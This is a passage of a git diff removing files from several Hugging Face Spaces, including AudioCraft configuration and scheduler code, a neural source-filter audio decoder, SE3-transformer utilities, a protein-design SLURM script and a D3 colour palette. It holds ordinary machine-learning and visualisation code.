config/teams.yaml. - Use the following environment variables to specify the cluster, team or configuration: - - AUDIOCRAFT_CLUSTER (optional): Cluster type to enforce. Useful if the cluster type - cannot be inferred automatically. - AUDIOCRAFT_CONFIG (optional): Path to yaml config holding the teams configuration. - If not set, configuration is read from config/teams.yaml. - AUDIOCRAFT_TEAM (optional): Name of the team. Recommended to set to your own team. - Cluster configuration are shared across teams to match compute allocation, - specify your cluster configuration in the configuration file under a key mapping - your team name. - """ - _instance = None - DEFAULT_TEAM = "default" - - def __init__(self) -> None: - """Loads configuration.""" - self.team: str = os.getenv("AUDIOCRAFT_TEAM", self.DEFAULT_TEAM) - cluster_type = _guess_cluster_type() - cluster = os.getenv( - "AUDIOCRAFT_CLUSTER", cluster_type.value - ) - logger.info("Detecting cluster type %s", cluster_type) - - self.cluster: str = cluster - - config_path = os.getenv( - "AUDIOCRAFT_CONFIG", - Path(__file__) - .parent.parent.joinpath("config/teams", self.team) - .with_suffix(".yaml"), - ) - self.config = omegaconf.OmegaConf.load(config_path) - self._dataset_mappers = [] - cluster_config = self._get_cluster_config() - if "dataset_mappers" in cluster_config: - for pattern, repl in cluster_config["dataset_mappers"].items(): - regex = re.compile(pattern) - self._dataset_mappers.append((regex, repl)) - - def _get_cluster_config(self) -> omegaconf.DictConfig: - assert isinstance(self.config, omegaconf.DictConfig) - return self.config[self.cluster] - - @classmethod - def instance(cls): - if cls._instance is None: - cls._instance = cls() - return cls._instance - - @classmethod - def reset(cls): - """Clears the environment and forces a reload on next invocation.""" - cls._instance = None - - @classmethod - def get_team(cls) -> str: - """Gets the selected team as dictated by the AUDIOCRAFT_TEAM env var. - If not defined, defaults to "labs". - """ - return cls.instance().team - - @classmethod - def get_cluster(cls) -> str: - """Gets the detected cluster. - This value can be overridden by the AUDIOCRAFT_CLUSTER env var. 
- """ - return cls.instance().cluster - - @classmethod - def get_dora_dir(cls) -> Path: - """Gets the path to the dora directory for the current team and cluster. - Value is overridden by the AUDIOCRAFT_DORA_DIR env var. - """ - cluster_config = cls.instance()._get_cluster_config() - dora_dir = os.getenv("AUDIOCRAFT_DORA_DIR", cluster_config["dora_dir"]) - logger.warning(f"Dora directory: {dora_dir}") - return Path(dora_dir) - - @classmethod - def get_reference_dir(cls) -> Path: - """Gets the path to the reference directory for the current team and cluster. - Value is overridden by the AUDIOCRAFT_REFERENCE_DIR env var. - """ - cluster_config = cls.instance()._get_cluster_config() - return Path(os.getenv("AUDIOCRAFT_REFERENCE_DIR", cluster_config["reference_dir"])) - - @classmethod - def get_slurm_exclude(cls) -> tp.Optional[str]: - """Get the list of nodes to exclude for that cluster.""" - cluster_config = cls.instance()._get_cluster_config() - return cluster_config.get("slurm_exclude") - - @classmethod - def get_slurm_partitions(cls, partition_types: tp.Optional[tp.List[str]] = None) -> str: - """Gets the requested partitions for the current team and cluster as a comma-separated string. - - Args: - partition_types (list[str], optional): partition types to retrieve. Values must be - from ['global', 'team']. If not provided, the global partition is returned. - """ - if not partition_types: - partition_types = ["global"] - - cluster_config = cls.instance()._get_cluster_config() - partitions = [ - cluster_config["partitions"][partition_type] - for partition_type in partition_types - ] - return ",".join(partitions) - - @classmethod - def resolve_reference_path(cls, path: tp.Union[str, Path]) -> Path: - """Converts reference placeholder in path with configured reference dir to resolve paths. - - Args: - path (str or Path): Path to resolve. - Returns: - Path: Resolved path. - """ - path = str(path) - - if path.startswith("//reference"): - reference_dir = cls.get_reference_dir() - logger.warn(f"Reference directory: {reference_dir}") - assert ( - reference_dir.exists() and reference_dir.is_dir() - ), f"Reference directory does not exist: {reference_dir}." - path = re.sub("^//reference", str(reference_dir), path) - - return Path(path) - - @classmethod - def apply_dataset_mappers(cls, path: str) -> str: - """Applies dataset mapping regex rules as defined in the configuration. - If no rules are defined, the path is returned as-is. - """ - instance = cls.instance() - - for pattern, repl in instance._dataset_mappers: - path = pattern.sub(repl, path) - - return path diff --git a/spaces/matthoffner/AudioCraft_Plus/audiocraft/optim/linear_warmup_lr_scheduler.py b/spaces/matthoffner/AudioCraft_Plus/audiocraft/optim/linear_warmup_lr_scheduler.py deleted file mode 100644 index 03274a1ae52b6f20473973b77619f34b2bddd6a1..0000000000000000000000000000000000000000 --- a/spaces/matthoffner/AudioCraft_Plus/audiocraft/optim/linear_warmup_lr_scheduler.py +++ /dev/null @@ -1,35 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import typing as tp - -from torch.optim import Optimizer -from torch.optim.lr_scheduler import _LRScheduler - - -class LinearWarmupLRScheduler(_LRScheduler): - """Inverse square root LR scheduler. - - Args: - optimizer (Optimizer): Torch optimizer. - warmup_steps (int): Number of warmup steps. 
- warmup_init_lr (tp.Optional[float]): Initial learning rate - during warmup phase. When not set, use the provided learning rate. - """ - def __init__(self, optimizer: Optimizer, warmup_steps: int, warmup_init_lr: tp.Optional[float] = 0): - self.warmup_steps = warmup_steps - self.warmup_init_lr = warmup_init_lr - super().__init__(optimizer) - - def _get_sched_lr(self, lr: float, step: int): - if step < self.warmup_steps: - warmup_init_lr = self.warmup_init_lr or 0 - lr_step = (lr - warmup_init_lr) / self.warmup_steps - lr = warmup_init_lr + step * lr_step - return lr - - def get_lr(self): - return [self._get_sched_lr(base_lr, self.last_epoch) for base_lr in self.base_lrs] diff --git a/spaces/maxime/chat-with-your-telegram-chat/cli_app.py b/spaces/maxime/chat-with-your-telegram-chat/cli_app.py deleted file mode 100644 index 20fd8a7af75f42f506c8230d673d23b2eea39cb6..0000000000000000000000000000000000000000 --- a/spaces/maxime/chat-with-your-telegram-chat/cli_app.py +++ /dev/null @@ -1,17 +0,0 @@ -import pickle -from query_data import get_chain - - -if __name__ == "__main__": - with open("vectorstore.pkl", "rb") as f: - vectorstore = pickle.load(f) - qa_chain = get_chain(vectorstore) - chat_history = [] - print("Chat with your docs!") - while True: - print("Human:") - question = input() - result = qa_chain({"question": question, "chat_history": chat_history}) - chat_history.append((question, result["answer"])) - print("AI:") - print(result["answer"]) diff --git a/spaces/maxmax20160403/sovits5.0/vits_decoder/nsf.py b/spaces/maxmax20160403/sovits5.0/vits_decoder/nsf.py deleted file mode 100644 index 1e9e6c7e344eb616a7ca427da1a02a2c2093c942..0000000000000000000000000000000000000000 --- a/spaces/maxmax20160403/sovits5.0/vits_decoder/nsf.py +++ /dev/null @@ -1,394 +0,0 @@ -import torch -import numpy as np -import sys -import torch.nn.functional as torch_nn_func - - -class PulseGen(torch.nn.Module): - """Definition of Pulse train generator - - There are many ways to implement pulse generator. - Here, PulseGen is based on SinGen. 
For a perfect - """ - - def __init__(self, samp_rate, pulse_amp=0.1, noise_std=0.003, voiced_threshold=0): - super(PulseGen, self).__init__() - self.pulse_amp = pulse_amp - self.sampling_rate = samp_rate - self.voiced_threshold = voiced_threshold - self.noise_std = noise_std - self.l_sinegen = SineGen( - self.sampling_rate, - harmonic_num=0, - sine_amp=self.pulse_amp, - noise_std=0, - voiced_threshold=self.voiced_threshold, - flag_for_pulse=True, - ) - - def forward(self, f0): - """Pulse train generator - pulse_train, uv = forward(f0) - input F0: tensor(batchsize=1, length, dim=1) - f0 for unvoiced steps should be 0 - output pulse_train: tensor(batchsize=1, length, dim) - output uv: tensor(batchsize=1, length, 1) - - Note: self.l_sine doesn't make sure that the initial phase of - a voiced segment is np.pi, the first pulse in a voiced segment - may not be at the first time step within a voiced segment - """ - with torch.no_grad(): - sine_wav, uv, noise = self.l_sinegen(f0) - - # sine without additive noise - pure_sine = sine_wav - noise - - # step t corresponds to a pulse if - # sine[t] > sine[t+1] & sine[t] > sine[t-1] - # & sine[t-1], sine[t+1], and sine[t] are voiced - # or - # sine[t] is voiced, sine[t-1] is unvoiced - # we use torch.roll to simulate sine[t+1] and sine[t-1] - sine_1 = torch.roll(pure_sine, shifts=1, dims=1) - uv_1 = torch.roll(uv, shifts=1, dims=1) - uv_1[:, 0, :] = 0 - sine_2 = torch.roll(pure_sine, shifts=-1, dims=1) - uv_2 = torch.roll(uv, shifts=-1, dims=1) - uv_2[:, -1, :] = 0 - - loc = (pure_sine > sine_1) * (pure_sine > sine_2) \ - * (uv_1 > 0) * (uv_2 > 0) * (uv > 0) \ - + (uv_1 < 1) * (uv > 0) - - # pulse train without noise - pulse_train = pure_sine * loc - - # additive noise to pulse train - # note that noise from sinegen is zero in voiced regions - pulse_noise = torch.randn_like(pure_sine) * self.noise_std - - # with additive noise on pulse, and unvoiced regions - pulse_train += pulse_noise * loc + pulse_noise * (1 - uv) - return pulse_train, sine_wav, uv, pulse_noise - - -class SignalsConv1d(torch.nn.Module): - """Filtering input signal with time invariant filter - Note: FIRFilter conducted filtering given fixed FIR weight - SignalsConv1d convolves two signals - Note: this is based on torch.nn.functional.conv1d - - """ - - def __init__(self): - super(SignalsConv1d, self).__init__() - - def forward(self, signal, system_ir): - """output = forward(signal, system_ir) - - signal: (batchsize, length1, dim) - system_ir: (length2, dim) - - output: (batchsize, length1, dim) - """ - if signal.shape[-1] != system_ir.shape[-1]: - print("Error: SignalsConv1d expects shape:") - print("signal (batchsize, length1, dim)") - print("system_id (batchsize, length2, dim)") - print("But received signal: {:s}".format(str(signal.shape))) - print(" system_ir: {:s}".format(str(system_ir.shape))) - sys.exit(1) - padding_length = system_ir.shape[0] - 1 - groups = signal.shape[-1] - - # pad signal on the left - signal_pad = torch_nn_func.pad(signal.permute(0, 2, 1), (padding_length, 0)) - # prepare system impulse response as (dim, 1, length2) - # also flip the impulse response - ir = torch.flip(system_ir.unsqueeze(1).permute(2, 1, 0), dims=[2]) - # convolute - output = torch_nn_func.conv1d(signal_pad, ir, groups=groups) - return output.permute(0, 2, 1) - - -class CyclicNoiseGen_v1(torch.nn.Module): - """CyclicnoiseGen_v1 - Cyclic noise with a single parameter of beta. 
- Pytorch v1 implementation assumes f_t is also fixed - """ - - def __init__(self, samp_rate, noise_std=0.003, voiced_threshold=0): - super(CyclicNoiseGen_v1, self).__init__() - self.samp_rate = samp_rate - self.noise_std = noise_std - self.voiced_threshold = voiced_threshold - - self.l_pulse = PulseGen( - samp_rate, - pulse_amp=1.0, - noise_std=noise_std, - voiced_threshold=voiced_threshold, - ) - self.l_conv = SignalsConv1d() - - def noise_decay(self, beta, f0mean): - """decayed_noise = noise_decay(beta, f0mean) - decayed_noise = n[t]exp(-t * f_mean / beta / samp_rate) - - beta: (dim=1) or (batchsize=1, 1, dim=1) - f0mean (batchsize=1, 1, dim=1) - - decayed_noise (batchsize=1, length, dim=1) - """ - with torch.no_grad(): - # exp(-1.0 n / T) < 0.01 => n > -log(0.01)*T = 4.60*T - # truncate the noise when decayed by -40 dB - length = 4.6 * self.samp_rate / f0mean - length = length.int() - time_idx = torch.arange(0, length, device=beta.device) - time_idx = time_idx.unsqueeze(0).unsqueeze(2) - time_idx = time_idx.repeat(beta.shape[0], 1, beta.shape[2]) - - noise = torch.randn(time_idx.shape, device=beta.device) - - # due to Pytorch implementation, use f0_mean as the f0 factor - decay = torch.exp(-time_idx * f0mean / beta / self.samp_rate) - return noise * self.noise_std * decay - - def forward(self, f0s, beta): - """Producde cyclic-noise""" - # pulse train - pulse_train, sine_wav, uv, noise = self.l_pulse(f0s) - pure_pulse = pulse_train - noise - - # decayed_noise (length, dim=1) - if (uv < 1).all(): - # all unvoiced - cyc_noise = torch.zeros_like(sine_wav) - else: - f0mean = f0s[uv > 0].mean() - - decayed_noise = self.noise_decay(beta, f0mean)[0, :, :] - # convolute - cyc_noise = self.l_conv(pure_pulse, decayed_noise) - - # add noise in invoiced segments - cyc_noise = cyc_noise + noise * (1.0 - uv) - return cyc_noise, pulse_train, sine_wav, uv, noise - - -class SineGen(torch.nn.Module): - """Definition of sine generator - SineGen(samp_rate, harmonic_num = 0, - sine_amp = 0.1, noise_std = 0.003, - voiced_threshold = 0, - flag_for_pulse=False) - - samp_rate: sampling rate in Hz - harmonic_num: number of harmonic overtones (default 0) - sine_amp: amplitude of sine-wavefrom (default 0.1) - noise_std: std of Gaussian noise (default 0.003) - voiced_thoreshold: F0 threshold for U/V classification (default 0) - flag_for_pulse: this SinGen is used inside PulseGen (default False) - - Note: when flag_for_pulse is True, the first time step of a voiced - segment is always sin(np.pi) or cos(0) - """ - - def __init__( - self, - samp_rate, - harmonic_num=0, - sine_amp=0.1, - noise_std=0.003, - voiced_threshold=0, - flag_for_pulse=False, - ): - super(SineGen, self).__init__() - self.sine_amp = sine_amp - self.noise_std = noise_std - self.harmonic_num = harmonic_num - self.dim = self.harmonic_num + 1 - self.sampling_rate = samp_rate - self.voiced_threshold = voiced_threshold - self.flag_for_pulse = flag_for_pulse - - def _f02uv(self, f0): - # generate uv signal - uv = torch.ones_like(f0) - uv = uv * (f0 > self.voiced_threshold) - return uv - - def _f02sine(self, f0_values): - """f0_values: (batchsize, length, dim) - where dim indicates fundamental tone and overtones - """ - # convert to F0 in rad. 
The interger part n can be ignored - # because 2 * np.pi * n doesn't affect phase - rad_values = (f0_values / self.sampling_rate) % 1 - - # initial phase noise (no noise for fundamental component) - rand_ini = torch.rand( - f0_values.shape[0], f0_values.shape[2], device=f0_values.device - ) - rand_ini[:, 0] = 0 - rad_values[:, 0, :] = rad_values[:, 0, :] + rand_ini - - # instantanouse phase sine[t] = sin(2*pi \sum_i=1 ^{t} rad) - if not self.flag_for_pulse: - # for normal case - - # To prevent torch.cumsum numerical overflow, - # it is necessary to add -1 whenever \sum_k=1^n rad_value_k > 1. - # Buffer tmp_over_one_idx indicates the time step to add -1. - # This will not change F0 of sine because (x-1) * 2*pi = x * 2*pi - tmp_over_one = torch.cumsum(rad_values, 1) % 1 - tmp_over_one_idx = (tmp_over_one[:, 1:, :] - tmp_over_one[:, :-1, :]) < 0 - cumsum_shift = torch.zeros_like(rad_values) - cumsum_shift[:, 1:, :] = tmp_over_one_idx * -1.0 - - sines = torch.sin( - torch.cumsum(rad_values + cumsum_shift, dim=1) * 2 * np.pi - ) - else: - # If necessary, make sure that the first time step of every - # voiced segments is sin(pi) or cos(0) - # This is used for pulse-train generation - - # identify the last time step in unvoiced segments - uv = self._f02uv(f0_values) - uv_1 = torch.roll(uv, shifts=-1, dims=1) - uv_1[:, -1, :] = 1 - u_loc = (uv < 1) * (uv_1 > 0) - - # get the instantanouse phase - tmp_cumsum = torch.cumsum(rad_values, dim=1) - # different batch needs to be processed differently - for idx in range(f0_values.shape[0]): - temp_sum = tmp_cumsum[idx, u_loc[idx, :, 0], :] - temp_sum[1:, :] = temp_sum[1:, :] - temp_sum[0:-1, :] - # stores the accumulation of i.phase within - # each voiced segments - tmp_cumsum[idx, :, :] = 0 - tmp_cumsum[idx, u_loc[idx, :, 0], :] = temp_sum - - # rad_values - tmp_cumsum: remove the accumulation of i.phase - # within the previous voiced segment. - i_phase = torch.cumsum(rad_values - tmp_cumsum, dim=1) - - # get the sines - sines = torch.cos(i_phase * 2 * np.pi) - return sines - - def forward(self, f0): - """sine_tensor, uv = forward(f0) - input F0: tensor(batchsize=1, length, dim=1) - f0 for unvoiced steps should be 0 - output sine_tensor: tensor(batchsize=1, length, dim) - output uv: tensor(batchsize=1, length, 1) - """ - with torch.no_grad(): - f0_buf = torch.zeros(f0.shape[0], f0.shape[1], self.dim, device=f0.device) - # fundamental component - f0_buf[:, :, 0] = f0[:, :, 0] - for idx in np.arange(self.harmonic_num): - # idx + 2: the (idx+1)-th overtone, (idx+2)-th harmonic - f0_buf[:, :, idx + 1] = f0_buf[:, :, 0] * (idx + 2) - - # generate sine waveforms - sine_waves = self._f02sine(f0_buf) * self.sine_amp - - # generate uv signal - # uv = torch.ones(f0.shape) - # uv = uv * (f0 > self.voiced_threshold) - uv = self._f02uv(f0) - - # noise: for unvoiced should be similar to sine_amp - # std = self.sine_amp/3 -> max value ~ self.sine_amp - # . 
for voiced regions is self.noise_std - noise_amp = uv * self.noise_std + (1 - uv) * self.sine_amp / 3 - noise = noise_amp * torch.randn_like(sine_waves) - - # first: set the unvoiced part to 0 by uv - # then: additive noise - sine_waves = sine_waves * uv + noise - return sine_waves - - -class SourceModuleCycNoise_v1(torch.nn.Module): - """SourceModuleCycNoise_v1 - SourceModule(sampling_rate, noise_std=0.003, voiced_threshod=0) - sampling_rate: sampling_rate in Hz - - noise_std: std of Gaussian noise (default: 0.003) - voiced_threshold: threshold to set U/V given F0 (default: 0) - - cyc, noise, uv = SourceModuleCycNoise_v1(F0_upsampled, beta) - F0_upsampled (batchsize, length, 1) - beta (1) - cyc (batchsize, length, 1) - noise (batchsize, length, 1) - uv (batchsize, length, 1) - """ - - def __init__(self, sampling_rate, noise_std=0.003, voiced_threshod=0): - super(SourceModuleCycNoise_v1, self).__init__() - self.sampling_rate = sampling_rate - self.noise_std = noise_std - self.l_cyc_gen = CyclicNoiseGen_v1(sampling_rate, noise_std, voiced_threshod) - - def forward(self, f0_upsamped, beta): - """ - cyc, noise, uv = SourceModuleCycNoise_v1(F0, beta) - F0_upsampled (batchsize, length, 1) - beta (1) - cyc (batchsize, length, 1) - noise (batchsize, length, 1) - uv (batchsize, length, 1) - """ - # source for harmonic branch - cyc, pulse, sine, uv, add_noi = self.l_cyc_gen(f0_upsamped, beta) - - # source for noise branch, in the same shape as uv - noise = torch.randn_like(uv) * self.noise_std / 3 - return cyc, noise, uv - - -class SourceModuleHnNSF(torch.nn.Module): - def __init__( - self, - sampling_rate=32000, - sine_amp=0.1, - add_noise_std=0.003, - voiced_threshod=0, - ): - super(SourceModuleHnNSF, self).__init__() - harmonic_num = 10 - self.sine_amp = sine_amp - self.noise_std = add_noise_std - - # to produce sine waveforms - self.l_sin_gen = SineGen( - sampling_rate, harmonic_num, sine_amp, add_noise_std, voiced_threshod - ) - - # to merge source harmonics into a single excitation - self.l_tanh = torch.nn.Tanh() - self.register_buffer('merge_w', torch.FloatTensor([[ - 0.2942, -0.2243, 0.0033, -0.0056, -0.0020, -0.0046, - 0.0221, -0.0083, -0.0241, -0.0036, -0.0581]])) - self.register_buffer('merge_b', torch.FloatTensor([0.0008])) - - def forward(self, x): - """ - Sine_source = SourceModuleHnNSF(F0_sampled) - F0_sampled (batchsize, length, 1) - Sine_source (batchsize, length, 1) - """ - # source for harmonic branch - sine_wavs = self.l_sin_gen(x) - sine_wavs = torch_nn_func.linear( - sine_wavs, self.merge_w) + self.merge_b - sine_merge = self.l_tanh(sine_wavs) - return sine_merge diff --git a/spaces/mb1te/PSII_FINAL/README.md b/spaces/mb1te/PSII_FINAL/README.md deleted file mode 100644 index 1091062a0aeb5270aa2e882889fd7c02e0bcdc16..0000000000000000000000000000000000000000 --- a/spaces/mb1te/PSII_FINAL/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: PSII FINAL -emoji: 📊 -colorFrom: blue -colorTo: green -sdk: docker -pinned: false -license: apache-2.0 -app_port: 8080 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/merle/PROTEIN_GENERATOR/examples/binder_design.sh b/spaces/merle/PROTEIN_GENERATOR/examples/binder_design.sh deleted file mode 100644 index ae66f0273cb2d3fa893717d7f3102ae01bd957b7..0000000000000000000000000000000000000000 --- a/spaces/merle/PROTEIN_GENERATOR/examples/binder_design.sh +++ /dev/null @@ -1,16 +0,0 @@ -#!/bin/bash -#SBATCH -J seq_diff -#SBATCH -p gpu -#SBATCH --mem=8g -#SBATCH 
--gres=gpu:a6000:1 -#SBATCH -o ./out/slurm/slurm_%j.out - -source activate /software/conda/envs/SE3nv - -srun python ../inference.py \ - --num_designs 10 \ - --out out/binder_design \ - --pdb pdbs/cd86.pdb \ - --T 25 --save_best_plddt \ - --contigs B1-110,0 25-75 \ - --hotspots B40,B32,B87,B96,B30 diff --git a/spaces/merle/PROTEIN_GENERATOR/utils/model/se3_transformer/runtime/utils.py b/spaces/merle/PROTEIN_GENERATOR/utils/model/se3_transformer/runtime/utils.py deleted file mode 100644 index b6248fa6e5d94a14df6726eb73274a4727281a63..0000000000000000000000000000000000000000 --- a/spaces/merle/PROTEIN_GENERATOR/utils/model/se3_transformer/runtime/utils.py +++ /dev/null @@ -1,130 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# Permission is hereby granted, free of charge, to any person obtaining a -# copy of this software and associated documentation files (the "Software"), -# to deal in the Software without restriction, including without limitation -# the rights to use, copy, modify, merge, publish, distribute, sublicense, -# and/or sell copies of the Software, and to permit persons to whom the -# Software is furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in -# all copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL -# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING -# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER -# DEALINGS IN THE SOFTWARE. -# -# SPDX-FileCopyrightText: Copyright (c) 2021 NVIDIA CORPORATION & AFFILIATES -# SPDX-License-Identifier: MIT - -import argparse -import ctypes -import logging -import os -import random -from functools import wraps -from typing import Union, List, Dict - -import numpy as np -import torch -import torch.distributed as dist -from torch import Tensor - - -def aggregate_residual(feats1, feats2, method: str): - """ Add or concatenate two fiber features together. If degrees don't match, will use the ones of feats2. 
""" - if method in ['add', 'sum']: - return {k: (v + feats1[k]) if k in feats1 else v for k, v in feats2.items()} - elif method in ['cat', 'concat']: - return {k: torch.cat([v, feats1[k]], dim=1) if k in feats1 else v for k, v in feats2.items()} - else: - raise ValueError('Method must be add/sum or cat/concat') - - -def degree_to_dim(degree: int) -> int: - return 2 * degree + 1 - - -def unfuse_features(features: Tensor, degrees: List[int]) -> Dict[str, Tensor]: - return dict(zip(map(str, degrees), features.split([degree_to_dim(deg) for deg in degrees], dim=-1))) - - -def str2bool(v: Union[bool, str]) -> bool: - if isinstance(v, bool): - return v - if v.lower() in ('yes', 'true', 't', 'y', '1'): - return True - elif v.lower() in ('no', 'false', 'f', 'n', '0'): - return False - else: - raise argparse.ArgumentTypeError('Boolean value expected.') - - -def to_cuda(x): - """ Try to convert a Tensor, a collection of Tensors or a DGLGraph to CUDA """ - if isinstance(x, Tensor): - return x.cuda(non_blocking=True) - elif isinstance(x, tuple): - return (to_cuda(v) for v in x) - elif isinstance(x, list): - return [to_cuda(v) for v in x] - elif isinstance(x, dict): - return {k: to_cuda(v) for k, v in x.items()} - else: - # DGLGraph or other objects - return x.to(device=torch.cuda.current_device()) - - -def get_local_rank() -> int: - return int(os.environ.get('LOCAL_RANK', 0)) - - -def init_distributed() -> bool: - world_size = int(os.environ.get('WORLD_SIZE', 1)) - distributed = world_size > 1 - if distributed: - backend = 'nccl' if torch.cuda.is_available() else 'gloo' - dist.init_process_group(backend=backend, init_method='env://') - if backend == 'nccl': - torch.cuda.set_device(get_local_rank()) - else: - logging.warning('Running on CPU only!') - assert torch.distributed.is_initialized() - return distributed - - -def increase_l2_fetch_granularity(): - # maximum fetch granularity of L2: 128 bytes - _libcudart = ctypes.CDLL('libcudart.so') - # set device limit on the current device - # cudaLimitMaxL2FetchGranularity = 0x05 - pValue = ctypes.cast((ctypes.c_int * 1)(), ctypes.POINTER(ctypes.c_int)) - _libcudart.cudaDeviceSetLimit(ctypes.c_int(0x05), ctypes.c_int(128)) - _libcudart.cudaDeviceGetLimit(pValue, ctypes.c_int(0x05)) - assert pValue.contents.value == 128 - - -def seed_everything(seed): - seed = int(seed) - random.seed(seed) - np.random.seed(seed) - torch.manual_seed(seed) - torch.cuda.manual_seed_all(seed) - - -def rank_zero_only(fn): - @wraps(fn) - def wrapped_fn(*args, **kwargs): - if not dist.is_initialized() or dist.get_rank() == 0: - return fn(*args, **kwargs) - - return wrapped_fn - - -def using_tensor_cores(amp: bool) -> bool: - major_cc, minor_cc = torch.cuda.get_device_capability() - return (amp and major_cc >= 7) or major_cc >= 8 diff --git a/spaces/merve/anonymization/source/fill-in-the-blank/init.js b/spaces/merve/anonymization/source/fill-in-the-blank/init.js deleted file mode 100644 index 2e61759b05c45666ac2013000d8c4da1bc367630..0000000000000000000000000000000000000000 --- a/spaces/merve/anonymization/source/fill-in-the-blank/init.js +++ /dev/null @@ -1,426 +0,0 @@ -/* Copyright 2021 Google LLC. All Rights Reserved. - -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. 
-You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. -==============================================================================*/ - -window.ttSel = d3.select('body').selectAppend('div.tooltip.tooltip-hidden') - -window.palette = function palette(min, max){ - // https://blocks.roadtolarissa.com/1wheel/raw/94091c1f8a69d5966e48aef4ac19baf9/index.html?colors=00006e-006a78-00a963-8a8a8a-d5882a-a15142-7f0000&numTicks=255&space=lab&type=basis - var colors = ['#00006e', '#00006e', '#00006f', '#00006f', '#00006f', '#000070', '#000070', '#000170', '#000471', '#000871', '#000b71', '#000f72', '#001272', '#001572', '#001872', '#001b73', '#001e73', '#002173', '#002473', '#002674', '#002974', '#002c74', '#002e74', '#003174', '#003375', '#003675', '#003975', '#003b75', '#003e75', '#004075', '#004375', '#004575', '#004775', '#004a75', '#004c75', '#004f75', '#005175', '#005375', '#005675', '#005875', '#005a75', '#005c75', '#005e75', '#006175', '#006375', '#006574', '#006774', '#006974', '#006b74', '#006d74', '#006f73', '#007173', '#007373', '#007473', '#007672', '#007872', '#007a72', '#007b72', '#007d71', '#007f71', '#008071', '#008270', '#008370', '#008570', '#008670', '#00886f', '#00896f', '#008a6f', '#008c6f', '#008d6e', '#008e6e', '#008f6e', '#00906e', '#00916e', '#00926d', '#00936d', '#00946d', '#00956d', '#00966d', '#00976d', '#00976d', '#00986d', '#00996d', '#00996d', '#009a6d', '#009a6e', '#009b6e', '#009b6e', '#009b6e', '#079c6f', '#119c6f', '#189c6f', '#1e9c70', '#249c70', '#289c70', '#2d9c71', '#319c71', '#359c71', '#399c72', '#3c9c72', '#409c73', '#439c73', '#479b74', '#4a9b74', '#4d9b74', '#509b75', '#539a75', '#569a76', '#599976', '#5c9976', '#5f9976', '#629877', '#659877', '#679777', '#6a9777', '#6d9677', '#6f9678', '#729578', '#749578', '#779478', '#799477', '#7c9377', '#7e9377', '#819277', '#839277', '#859176', '#889176', '#8a9175', '#8c9075', '#8e9074', '#908f73', '#938f73', '#958e72', '#978e71', '#998e70', '#9b8d6f', '#9d8d6e', '#9f8d6d', '#a08c6c', '#a28c6b', '#a48c69', '#a68b68', '#a88b67', '#a98b65', '#ab8a64', '#ac8a63', '#ae8a61', '#af8960', '#b1895f', '#b2895d', '#b4885c', '#b5885a', '#b68859', '#b78757', '#b88756', '#b98755', '#ba8653', '#bb8652', '#bc8550', '#bd854f', '#be854d', '#bf844c', '#bf844b', '#c0834a', '#c08348', '#c18247', '#c18246', '#c28145', '#c28044', '#c28043', '#c27f42', '#c27e41', '#c37e40', '#c27d3f', '#c27c3f', '#c27b3e', '#c27a3d', '#c27a3d', '#c1793c', '#c1783c', '#c1773c', '#c0763b', '#c0753b', '#bf743a', '#bf733a', '#be713a', '#bd703a', '#bd6f39', '#bc6e39', '#bb6d39', '#bb6b38', '#ba6a38', '#b96938', '#b86737', '#b76637', '#b76537', '#b66336', '#b56236', '#b46035', '#b35e35', '#b25d34', '#b15b34', '#b05933', '#af5833', '#ae5632', '#ad5431', '#ad5230', '#ac502f', '#ab4e2f', '#aa4c2e', '#a94a2c', '#a8482b', '#a7462a', '#a64429', '#a54127', '#a43f26', '#a33d24', '#a33a23', '#a23721', '#a1351f', '#a0321e', '#9f2f1c', '#9e2c1a', '#9d2818', '#9c2516', '#9c2114', '#9b1d11', '#9a180f', '#99120d', '#980b0a', '#970207', '#960004', '#950001', '#940000', '#930000', '#920000', '#910000', '#900000', '#8f0000', '#8e0000', '#8e0000', '#8d0000', '#8c0000', '#8b0000', '#8a0000', '#890000', '#880000', '#870000', '#860000', 
'#850000', '#840000', '#830000', '#820000', '#810000', '#800000'] - - return v => { - var i = d3.clamp(0, (v - min)/(max - min), 1) - return colors[Math.round(i*(colors.length - 1))] - } - - // https://gka.github.io/palettes/#/99|d|00429d,96ffea,d1ea00|d1ea00,ff005e,93003a|1|1 - // https://gka.github.io/palettes/#/99|d|00429d,96ffea,f1f1d2|f1f1d2,ff005e,93003a|1|1 - //https://gka.github.io/palettes/#/99|d|00429d,76dfca,d1d1b3|d1d1b3,a787a8,93003a|1|1 - // https://gka.github.io/palettes/#/99|d|76dfca,00429d,000000|000000,93003a,ff005e|1|1 - - // https://gka.github.io/palettes/#/99|d|078977,91a5ff,555555|555555,e2bfe3,980000|0|1 - // https://gka.github.io/palettes/#/99|d|002854,a1ffe1,555555|555555,ffa361,980000|0|1 - // https://gka.github.io/palettes/#/99|d|002854,a1ffe1,616161|616161,f47e2a,9e005c|0|1 - // var nMid = 13 - // var midIndex = Math.floor(colors.length/2) - // var minIndex = midIndex - (nMid - 1)/2 - // var maxIndex = midIndex + (nMid - 1)/2 - // var interpolate = d3.interpolate(colors[minIndex], colors[maxIndex]) - - // d3.range(minIndex, maxIndex + 1).forEach(i => { - // colors[i] = interpolate((i - minIndex)/nMid) - // }) - - // return d => { - // var rv = 